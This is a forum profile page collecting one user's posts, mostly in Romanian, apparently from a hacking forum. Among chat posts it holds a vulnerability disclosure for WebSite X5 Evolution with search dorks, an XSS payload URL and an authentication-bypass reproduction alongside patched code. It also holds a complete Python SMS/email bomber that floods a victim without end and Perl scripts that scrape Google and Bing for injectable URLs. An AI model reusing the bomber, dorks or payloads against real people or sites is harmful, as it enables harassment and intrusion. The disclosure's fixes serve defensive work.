-
Posts
550 -
Joined
-
Last visited
-
Days Won
1
Everything posted by Htich
-
========================================= Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions) Vendor: www.websitex5.com Vulns: XSS && Auth Bypass Software License: Commercial Dork 1: inurl:imsearch.php Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php ========================================= About Software: ========================================== WebSite X5 Evolution 9 is the most versatile and complete solution you'll find for creating eye-catching, functional and professional websites, blogs and online stores. You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is perhaps most amazing is the sheer power and totality of the features it offers. http://www.websitex5.com/en/evolution-9.html *Nice Software and easy to use.* ========================================== About Vulnerabilities: [*] XSS: [*] site.tld/imsearch.php?search="\><script>alert(1);</script> Fix: Open imsearch.php and find: =============VULNERABLE CODE============== <?php $search = new imSearch(); $search->search(@$_GET['search'], @$_GET['page']); ?> ==========END OF VULNERABLE CODE========== REPLACE WITH: ==============FIXED CODE==================== <?php $search = new imSearch(); $search->search(@htmlspecialchars($_GET['search']), htmlspecialchars(@$_GET['page'])); ?> ===========END OF FIXED CODE================ [*] Second vulnerability is Authentication Bypass. [*] Vulnerable code: site.tld/admin/checkaccess.php ========= BEGIN VULNERABLE CODE =========== <?php require_once("../res/x5engine.php"); $login = new imPrivateArea(); if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) { if (basename($_SERVER['HTTP_REFERER']) == "login.php") header("Location: login.php?error"); else header("Location: login.php"); } else $logged = TRUE; // End of file checkaccess.php ==========END OF VULNERABLE CODE========== Notice flaw: Script continues execution. For reproduce: =============================================== Using Fiddler intercept the traffic from your browser and you will get output from scripts execution. Print screen: http://oi47.tinypic.com/f21sf7.jpg ==================== RAW======================= HTTP/1.1 302 Found Date: Sun, 25 Nov 2012 01:13:19 GMT Server: Apache Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: login.php Content-Length: 1188 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Language" content="it" /> <meta http-equiv="Content-Type-Script" content="text/javascript" /> <meta http-equiv="ImageToolbar" content="False" /> <meta name="MSSmartTagsPreventParsing" content="True" /> <script type="text/javascript" src="../res/jquery.js"></script> <script type="text/javascript" src="../res/x5engine.js"></script> <link rel="stylesheet" type="text/css" href="template.css" media="screen" /> <title>WebSite X5 Manager</title> </head> <body> <div id="imAdminPage"> <div id="imBody"> <div class="imSectionTitle"></div> <div class="imContent"> <div class="imTest pass">?????? PHP: 5.2.17<span>PASS</span></div> <div class="imTest pass">????????? ??????<span>PASS</span></div> <div class="imTest pass">???? ? ????????? ????? ?? ???????<span>PASS</span></div> </div> </div> </div> </body> ===============EOF RAW================== If your checkaccess.php isn't patched every file on /admin/*.php is vulnerable. Fixed Code: site.tld/admin/checkaccess.php ==============BEGIN =FIXED CODE================= <?php require_once("../res/x5engine.php"); $login = new imPrivateArea(); if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) { if (basename($_SERVER['HTTP_REFERER']) == "login.php") { header("Location: login.php?error"); exit; } else { header("Location: login.php"); exit; } } else { $logged = TRUE; } // End of file checkaccess.php ===============END OF FIXED CODE================
-
...Stim in ce sa investim $ , si stim cate vile ridicam de pe urma lor !
-
.... Admin / 123456 ... asa da la toate ! un "README" pt. oameni slow on brain ... !
-
1) Din cate stiu , la fiecare metoda de plata cu paypal trebuie sa ai atasat cardul ( sau un card oarecare ). 2) Din 10 situri gasite pe 6 au "Bugul" respectiv , o sa faci o caruta de bani . 2.1) Google va detecta "bugul" si spre norocul tau te va plati. 2.2)Poti sa vinzi bugul respectiv pe $ persoanelor intersate de acel bug 3) Daca nu , Bravo tie . 4 ) The END !
-
"So We are back in business" ?
-
1) folosesti in python sursa. 2 ) iti trebuie un cont de g-mail sau modifica servarul de smtp ( login,pass ,ip ) Imi zici daca ai reusit !
-
danyweb09 : Cum am zis .. pe google se baneaza foarte repede motorul de cautare.. pinkpanter : Sper sa te ajute sursa aia !
-
paikpanter @ Din cate stiu eu Google baneaza foarte repede "motoarele pentru cautare" , bing-ul nu ! OFF : Comanda manuala -> https://www.google.com/search?q=%22php?id%22&num=100&filter=0&start=%22.$i%29; } sub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; }
-
pret..ceva ? vinzi vinzi...dar pe ce ? oua , lapte ?
-
# Name: smsbomber.py # Coded by Cody from r00tsecurity.org # Released exclusively to r00tsecurity.org # Feel free to repost, leave credit in tact. import smtplib as s print"\n\r\n\rCody's SMS Bomber \n\r" print"\n\r\n\rPlease login with your Gmail account \n\r" username = raw_input("Gmail Username: ") password = raw_input("Gmail Password: ") obj = s.SMTP("smtp.gmail.com:587") obj.starttls() obj.login(username, password) print"\n\r" print """ What kind of bomb would you like to send? 1. SMS 2. Email """ option = input() print("\n\r") if option == 1: carrier_attack = 0 print """ What is their carrier? Respond with the corresponding number 1. Alltel 2. AT&T 3. Rogers 4. Sprint 5. T-Mobile 6. Telus 7. Verizon 8. Virgin Mobile 9. Orange \n\r """ carrier = input() if carrier == 1: carrier_attack = "@alltelmessage.com" if carrier == 2: carrier_attack = "@txt.att.net" if carrier == 3: carrier_attack = "@pcs.rogers.com" if carrier == 4: carrier_attack = "@messaging.sprintpcs.com" if carrier == 5: carrier_attack = "@tmomail.net" if carrier == 6: carrier_attack = "@msg.telus.com" if carrier == 7: carrier_attack = "@vtext.com" if carrier == 8: carrier_attack = "@vmobl.com" if carrier == 9: carrier_attack = "@sms.orange.pl" v_phone = raw_input("Phone Number: ") + str(carrier_attack) message = raw_input("Message: ") phone_message = ("From: %s\r\nTo: %s \r\n\r\n %s" % (username, "" .join(v_phone), "" .join(message))) while 1: obj.sendmail(username, v_phone, phone_message) print "Message sent! Sending another.. Press Ctrl + C to stop." if option == 2: v_email = raw_input("Email: ") message = raw_input("Message: ") email_message = (" \r\n\r\n From: %s\r\n To: %s\r\n\r\n %s" % (username, "" .join(v_email), "" .join(message))) while 1: obj.sendmail(username, v_email, email_message) print "Message sent! Sending another.. Press Ctrl + C to stop."
-
eu pana aicea am ajus -> View image: untitled , mai departe ... nu mai stiu cum sa trec... habar nu am cum sa aflu raspunsul..
-
)))))))))) EPiC ! +)))))))))))) OFF : Bine ai venit in "Jungla"
-
#!/usr/bin/perl -w #Dork Scann #By #cPanel use LWP::UserAgent; print - Pastebin.com Sper sa va fie de folos. ------------------------------ #!/usr/bin/perl -w #Dork Scann #By #cPanel use LWP::UserAgent; print q{ +----------------------[Dork Scan]----------------------+ | | | By cPanel | | v2 | +-------------------------------------------------------+ }; print "\nColoque Sua Dork:"; print "\n(Ex: inurl:home.php?id= )\n"; print "=>"; $dork = <STDIN>; chomp($dork); print "Scan Start!"; for ($i = 0; $i < 1000; $i += 10) { $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)'); $b->timeout(30); $b->env_proxy; $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content; $check = index($c, 'sb_pagN'); while (1) { $n = index($c, '<h3><a href="'); if ($n == -1) { last; } print "$s\n"; $c = substr($c, $n + 13); $s = substr($c, 0, index($c, '"')); open (txt,">>done.txt"); print txt $s,"\n"; close(txt); } if ($check == -1) { last; } } print "Scan Finalizado!"; system("done.txt"); exit;
-
Cand esti in necaz singura persoana care o sa te sustina moral/financiar o sa fie mama/tata sau cel mai exact acel prieten , care nu credeai ca-l intereseaza persoana ta/situatia ta.
-
oare mie nu imi merge linkul ca sa-l pot vedea ?
-
wElCome To The DarkSide We Have AOL & LINUX!
-
orcum din cate am citit in general despre Bitcoin.. daca ai vreo 10-20 de calc. i7 ( avion + placa video si ce ii mai trebuie ) poti sa ajungi lejer la 1k/moth.
-
Calde calde...dar Decat 2 merg testate din 10 .. orcum gj! Cu ce le-ai scant hscan sau luate la bruteforce?
-
ai de viata mea ... e cea mai lunga "poezie pe care am citito" ... luceafarul este mic .
-
Icode : ce ai mai cu omul , incearca si el sa faca ceva postari care pt. unii ii avantajaeaza sau nu ! P